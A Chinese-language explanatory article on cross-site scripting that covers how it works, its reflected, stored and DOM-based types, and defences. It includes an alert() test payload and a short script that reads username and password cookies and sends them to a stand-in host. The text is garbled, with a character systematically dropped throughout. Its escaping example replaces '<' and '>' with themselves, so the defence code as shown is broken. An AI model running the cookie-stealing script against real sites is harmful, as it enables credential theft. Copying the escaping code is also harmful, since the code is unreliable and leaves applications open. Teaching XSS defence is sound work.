跨 站脚本攻击（XSS）的原理与防范对策

关键词： 页木马； XSS； 攻击； 防范

一、前言

页木马是一种新型的恶意代码，一些攻击者将它人为的植入到服务器端的HTML页面中，通过客户端对服务器的访问来传播恶意攻击代码，它主要是通过浏览器以及其中的一些插件漏洞来进行植入， 页木马是一种客户端的攻击方式，它能有效的绕过防火墙的检测，隐秘的在客户端将恶意代码植入，客户端在不知情的情况下将这些恶意可执行程序进行下载和执行。给互联 用户造成严重的安全威胁。

二、XSS的机理与特征

1.XSS的成因

跨 站脚本XSS漏洞的成因其实就是Html的注入问题，攻击者的输入没有经过严格的控制进入了数据库，最终显示给来访的用户，导致可以在来访用户的浏览器里以浏览用户的身份执行Html代码，数据流程如下：攻击者的Html输入—>web程序—>进入数据库—>web程序—>用户浏览器。目前，所有的 站上几乎都提供一个站内或站外信息搜索框。在此搜索框中，您可以搜索到 站上任何可用的东西。这个搜索表单看起来这样：

图1-2

内部代码：<form action=“search.asp” method=“get”>

              <input type=“text” name=“q” value=” ”/>

               <input type=“submit”value=“搜索” />

              </form>

在asp 页上显示的搜索结果，同时它也列出了在“关键字”的搜索结果。web页面上,不管用户搜索什么内容，它将显示搜索结果在 页上。现在如果一个攻击者尝试注入恶意脚本，比如在搜索框中输入如下Html代码：“<script>alert(‘XSS 跨站脚本攻击’)</script>”则代码会变成<inputtype=”text” name=”q” value=”” <script>alert(‘XSS 跨站脚本攻击’)</script>  />，嵌入的JavaScript代码将会被浏览器执行，将显示一个警告框，提示“XSS跨站脚本攻击”。而不能完成用户搜索功能。（上述两个 站已经做XSS过滤，不能看见警告框）

下面是一个关于用户注册页面的例子,当然这个示例很简单，几乎攻击不到任何 站，仅仅看看其原理。我们知道很多 站都提供用户注册功能， 站后台数据库存储用户名、密码，方便用户下次登录，有些 站是直接用明文记录用户名、密码，恶意用户注册账户登录后使用简单工具查看cookie结构名称后，如果 站有XSS漏洞，那么简单的就可以获取其它用户的用户名、密码了。

在http://www.123.com/h.js中：

varusername=CookieHelper.getCookie(‘username’).value；

varpassword=CookieHelper.getCookie(‘password’).value；

varscript =document.createElement(‘script’)；

script.src=’http://www.123.com/index.aspsername=’+username+’&password=’+password；

document.body.appendChild(script)；

这样就轻松的获取了cookie中的用户名和密码。

2.跨 站脚本攻击的类型

2.1非持久性跨 站脚本攻击，非持久性 XSS 也称为是反射跨 站漏洞。它是最常见的 XSS 类型。在这，注入数据反射给攻击者。上面的例1，是非持续的攻击。典型的非持久性 XSS 包含与 XSS 的链接。

    2.2持久性跨 站脚本攻击（存储性），持久性跨 站脚本是存储跨站点脚本。当它发生时 XSS 变量存储在 站的数据库，每当用户打开 页时执行。每次用户打开浏览器，脚本执行。持久性 XSS 比非持久性 XSS更有害，因为每当用户打开要查看的内容的 页时，将自动执行该脚本。上面例2就是持久性跨 站脚本攻击。

   2.3基于DOM的跨站脚本攻击，基于 DOM 的 XSS 有时也称为“type-0XSS”。它发生时， XSS 变量执行由 DOM 修改用户的浏览器 页的结果。在客户端的 HTTP 响应不会更改，但以恶意的方式执行的脚本。

三、XSS防范对策

XSS攻击的模式很简单，就是把自己的代码嵌入到页面里，随页面一块执行；XSS攻击的防范也一样简单，对于 站的开发者，首先应该把精力放到对所有用户提交内容进行可靠的输入验证上。这些提交内容包括HTML、URL、查询关键字、http头、post、get数据等。只接受在你所规定长度范围内、采用适当格式、你所希望的字符。阻塞、过滤或者忽略其它的任何东西。针对出现在不同位置的用户输入内容，其处理策略有所不同。

1、html

只需要处理掉< > 即可，只要没有html标签，页面就是安全的。可以使用asp内置方法Replace (str,“<”,“<”) 　Replace (str,“>”,“>”) 来处理待输出的内容，将<,>, 转义。

2、JS

将要输出到js代码片断中的用户输入内容没有好的办法进行处理；仅转义少数字符不能保证去掉所有的攻击可能。因此，一般建议不要把用户产生的内容直接输出到js片断中。

如果条件所限，必须将内容直接输出，有如下方法可供选择：

1) 如果待输出的内容有特定的取值返回或者特定的格式，可以使用白名单或者正则表达式进行处理。

2) 可以将内容输出到html的隐藏标签或隐藏表单中，js通过获取标签的内容得到该内容。

3、检查

那么，对已有的页面，该如何检查呢个问题的回答是，目前没有很好的办法能完全检查出服务器中可能存在XSS攻击的页面；有一些办法可以检查出比较明显的疏漏，其基本思路如下：

1）从apache的access_log中取出所有unique的请求，依次修改其某一个参数为 “<script>alert(‘xss’)</script>”，发起请求。

2）获取返回的内容，如果内容中有原样的该字符串，表明此可疑输入没有经过处理便输出到页面上，页面存在隐患，需要处理。

通过这种办法，可以检查出绝大多数能通过get请求发起的XSS攻击。那些在access_log没有出现的请求参数，这里没有检查到，可能有所遗漏，就需要手动去整理，测试。通过Post发起的请求需要用另外一种策略进行检查。其思路如下：将 站上所有可以输入的表单，依次输入特征字符串，比如说< ‘ ” >，如果提交后产生的页面中含有未处理的此字符串，说明存在隐患。

通过以上分析我们看到，XSS是一种危害较大、较难防范，并且更加隐蔽的攻击方式。其实只要明白其原理，再加上勤加思考防范的对策，就可以根治XSS漏洞。

参考文献：

1. 《 页木马攻防实战》电子工业出版 ，任飞，章炜，张爱华编著/ 2009-05

2. 针对基于编码的跨站脚本攻击分析及防范方法，张伟，吴灏 小型微型计算机系统、/ 2013年。

3. 页木马机理与防御技术 张慧琳，邹维，韩心慧  软件学 / 2013年4.

http://wenku.baidu.com/view/d66b6c554431b90d6c85c7b3.html